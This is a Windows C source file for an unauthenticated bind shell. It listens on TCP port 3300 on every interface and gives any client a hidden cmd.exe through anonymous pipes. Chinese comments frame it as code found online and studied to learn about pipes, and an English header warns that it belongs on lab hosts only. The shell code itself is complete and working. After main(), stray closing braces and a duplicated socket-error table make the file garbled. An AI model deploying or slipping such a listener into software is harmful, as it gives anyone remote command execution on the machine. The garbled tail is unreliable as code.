// vctelnetserver.cpp : Defines the entry point for the console application.
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <string.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
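/*
 * NOTE(security): this program is an UNAUTHENTICATED BIND SHELL.  It listens on
 * every interface (INADDR_ANY) on TCP port 3300 and hands whoever connects an
 * interactive cmd.exe running with the privileges of the account that started
 * this process.  It is kept as a teaching example of anonymous pipes +
 * CreateProcess; run it only on an isolated lab host, never on a reachable box.
 *
 * Fixes over the original listing:
 *  - `(ret = CreatePipe(...)) = 0` assigned instead of compared, so pipe
 *    failures were never detected; now checked with `!CreatePipe(...)`.
 *  - GetSystemDirectory() was given MAX_PATH+1 for a 256-byte buffer and
 *    followed by an unbounded strcat(); the path is now length-checked.
 *  - recv()'s 0/-1 on disconnect was passed to WriteFile() as a DWORD byte
 *    count (out-of-bounds read from the stack buffer) and the loop never
 *    ended; disconnect and child exit now terminate the session.
 *  - printf("%s") on a non-NUL-terminated buffer read past the data; the
 *    local echo is now length-bounded.
 *  - Lock-step ReadFile/recv blocked forever on a command with no output;
 *    the pump now polls the pipe (PeekNamedPipe) and the socket (select).
 *  - The parent's pipe ends and both sockets were inherited by cmd.exe;
 *    they are now marked non-inheritable, and the child's ends are closed
 *    in the parent after CreateProcess so EOF is observable.
 *  - Client socket, pipe and process handles are released per connection.
 */

/* Size of the per-session staging buffer (the original used 1024). */
#define SHELL_BUF_SIZE 1024

/* Parent-side handles for one spawned cmd.exe. */
struct shell_session {
    HANDLE hInWrite;   /* parent writes here -> child's stdin */
    HANDLE hOutRead;   /* parent reads here  <- child's stdout+stderr */
    HANDLE hProcess;   /* the cmd.exe process */
};

/* Send exactly `len` bytes, looping over short sends.  Returns 0 on success,
 * -1 if the peer closed or send() failed. */
static int send_all(SOCKET sock, const char *p, int len)
{
    while (len > 0) {
        int sent = send(sock, p, len, 0);
        if (sent == SOCKET_ERROR || sent == 0)
            return -1;
        p += sent;
        len -= sent;
    }
    return 0;
}

/* Create the two anonymous pipes and launch a hidden cmd.exe whose std
 * handles are wired to them.  On success fills *s and returns TRUE; on any
 * failure prints the Win32 error, releases everything it opened and returns
 * FALSE (the caller then just drops the connection). */
static BOOL spawn_shell(struct shell_session *s)
{
    SECURITY_ATTRIBUTES sa;
    HANDLE hInRead = NULL, hOutWrite = NULL;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char cmdline[MAX_PATH + 16];
    UINT dirlen;

    s->hInWrite = NULL;
    s->hOutRead = NULL;
    s->hProcess = NULL;

    sa.nLength = sizeof sa;
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;          /* the child must inherit its two ends */

    /* stdin pipe: child reads hInRead, parent writes s->hInWrite */
    if (!CreatePipe(&hInRead, &s->hInWrite, &sa, 0)) {
        printf("CreatePipe(stdin) failed with error %lu\n", GetLastError());
        return FALSE;
    }
    /* stdout/stderr pipe: child writes hOutWrite, parent reads s->hOutRead */
    if (!CreatePipe(&s->hOutRead, &hOutWrite, &sa, 0)) {
        printf("CreatePipe(stdout) failed with error %lu\n", GetLastError());
        goto fail;
    }
    /* Only the child's ends may cross into cmd.exe.  If the parent's ends were
     * inherited as well, the child would hold a writer on its own stdout pipe
     * and the parent could never see EOF when cmd.exe exits. */
    SetHandleInformation(s->hInWrite, HANDLE_FLAG_INHERIT, 0);
    SetHandleInformation(s->hOutRead, HANDLE_FLAG_INHERIT, 0);

    /* Build "<system dir>\cmd.exe" with a bounds check.  The A-suffixed APIs
     * are used explicitly because the buffer is char, not TCHAR. */
    dirlen = GetSystemDirectoryA(cmdline, sizeof cmdline);
    if (dirlen == 0 || dirlen + sizeof("\\cmd.exe") > sizeof cmdline) {
        printf("GetSystemDirectory failed with error %lu\n", GetLastError());
        goto fail;
    }
    strcat(cmdline, "\\cmd.exe");      /* fits: checked above, incl. NUL */

    ZeroMemory(&si, sizeof si);
    si.cb = sizeof si;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;          /* no console window on the host */
    si.hStdInput = hInRead;
    si.hStdOutput = hOutWrite;
    si.hStdError = hOutWrite;

    /* bInheritHandles=TRUE is required for the std handles to reach the child.
     * Every other inheritable handle in this process (notably sockets, which
     * are inheritable by default) must be marked non-inheritable by main(). */
    if (!CreateProcessA(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        printf("CreateProcess failed with error %lu\n", GetLastError());
        goto fail;
    }
    CloseHandle(pi.hThread);
    s->hProcess = pi.hProcess;
    /* The child owns its ends now; drop ours so ReadFile reports EOF later. */
    CloseHandle(hInRead);
    CloseHandle(hOutWrite);
    return TRUE;

fail:
    if (hInRead)      CloseHandle(hInRead);
    if (hOutWrite)    CloseHandle(hOutWrite);
    if (s->hInWrite)  CloseHandle(s->hInWrite);
    if (s->hOutRead)  CloseHandle(s->hOutRead);
    s->hInWrite = NULL;
    s->hOutRead = NULL;
    return FALSE;
}

/* Relay bytes between the client socket and cmd.exe until the client
 * disconnects, the socket errors, or cmd.exe exits.  Child output is also
 * echoed on the local console, as in the original. */
static void pump_session(SOCKET client, struct shell_session *s)
{
    char buf[SHELL_BUF_SIZE];

    for (;;) {
        DWORD avail = 0, n = 0;
        fd_set readable;
        struct timeval poll_wait;
        int r;

        /* child -> client: read only when bytes are queued, so a command that
         * prints nothing cannot wedge the loop inside a blocking ReadFile. */
        if (!PeekNamedPipe(s->hOutRead, NULL, 0, NULL, &avail, NULL))
            return;                    /* pipe broken: cmd.exe is gone */
        if (avail > 0) {
            if (!ReadFile(s->hOutRead, buf, sizeof buf, &n, NULL) || n == 0)
                return;
            if (send_all(client, buf, n) != 0)
                return;                /* client went away */
            fwrite(buf, 1, n, stdout); /* local echo, length-bounded */
            continue;                  /* drain pending output before polling the socket */
        }
        if (WaitForSingleObject(s->hProcess, 0) == WAIT_OBJECT_0)
            return;                    /* cmd.exe exited (e.g. "exit") */

        /* client -> child: short select() timeout so the pipe is re-polled. */
        FD_ZERO(&readable);
        FD_SET(client, &readable);
        poll_wait.tv_sec = 0;
        poll_wait.tv_usec = 10000;
        r = select(0, &readable, NULL, NULL, &poll_wait);
        if (r == SOCKET_ERROR)
            return;
        if (r == 0)
            continue;
        r = recv(client, buf, sizeof buf, 0);
        if (r <= 0)
            return;                    /* 0 = orderly close, <0 = error; never hand -1 bytes to WriteFile */
        if (!WriteFile(s->hInWrite, buf, (DWORD)r, &n, NULL))
            return;
    }
}

/* Tear down one session: EOF the child's stdin, give it a moment to exit,
 * kill it if it does not, and release all handles so a dropped connection
 * never leaves an orphaned shell behind. */
static void close_session(struct shell_session *s)
{
    if (s->hInWrite)
        CloseHandle(s->hInWrite);      /* cmd.exe sees EOF on stdin */
    if (s->hOutRead)
        CloseHandle(s->hOutRead);
    if (s->hProcess) {
        if (WaitForSingleObject(s->hProcess, 500) != WAIT_OBJECT_0)
            TerminateProcess(s->hProcess, 1);
        CloseHandle(s->hProcess);
    }
    s->hInWrite = NULL;
    s->hOutRead = NULL;
    s->hProcess = NULL;
}

/* Entry point: initialise Winsock, listen on TCP 3300 on all interfaces and
 * serve one cmd.exe per accepted connection, sequentially.  Returns 1 on a
 * fatal setup error, 0 if the accept loop ends. */
int main(void)
{
    WSADATA wsa;                       /* filled by WSAStartup with Winsock DLL details */
    SOCKET listener, client;
    SOCKADDR_IN local, peer;
    int peer_len, rc;
    const int pcport = 3300;           /* listening TCP port */

    /* request Winsock 2.2 */
    rc = WSAStartup(MAKEWORD(2, 2), &wsa);
    if (rc != 0) {
        printf("WSAStartup failed with error %d\n", rc);
        return 1;
    }

    listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (listener == INVALID_SOCKET) {
        printf("socket failed with error %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    /* Sockets are inheritable by default; keep the listener out of cmd.exe. */
    SetHandleInformation((HANDLE)listener, HANDLE_FLAG_INHERIT, 0);

    ZeroMemory(&local, sizeof local);
    local.sin_family = AF_INET;
    local.sin_port = htons(pcport);            /* network byte order */
    local.sin_addr.s_addr = htonl(INADDR_ANY); /* every interface -- see security note above */
    if (bind(listener, (SOCKADDR *)&local, sizeof local) == SOCKET_ERROR) {
        printf("bind failed with error %d\n", WSAGetLastError());
        closesocket(listener);
        WSACleanup();
        return 1;
    }
    if (listen(listener, 5) == SOCKET_ERROR) {
        printf("listen failed with error %d\n", WSAGetLastError());
        closesocket(listener);
        WSACleanup();
        return 1;
    }

    for (;;) {
        struct shell_session session;
        unsigned long ip;

        peer_len = sizeof peer;
        client = accept(listener, (SOCKADDR *)&peer, &peer_len);
        if (client == INVALID_SOCKET) {
            int err = WSAGetLastError();
            printf("accept failed with error %d\n", err);
            if (err == WSAECONNRESET)
                continue;              /* transient: the peer aborted mid-handshake */
            break;                     /* anything else: do not spin on a dead listener */
        }
        /* the per-client socket must not leak into cmd.exe either */
        SetHandleInformation((HANDLE)client, HANDLE_FLAG_INHERIT, 0);

        /* audit line: who got a shell (IPv4 only, no deprecated inet_ntoa) */
        ip = ntohl(peer.sin_addr.s_addr);
        printf("connection from %lu.%lu.%lu.%lu:%u\n",
               (ip >> 24) & 255, (ip >> 16) & 255, (ip >> 8) & 255, ip & 255,
               (unsigned)ntohs(peer.sin_port));

        if (spawn_shell(&session)) {
            pump_session(client, &session);
            close_session(&session);
        }
        closesocket(client);
    }

    closesocket(listener);
    WSACleanup();
    return 0;
}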
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/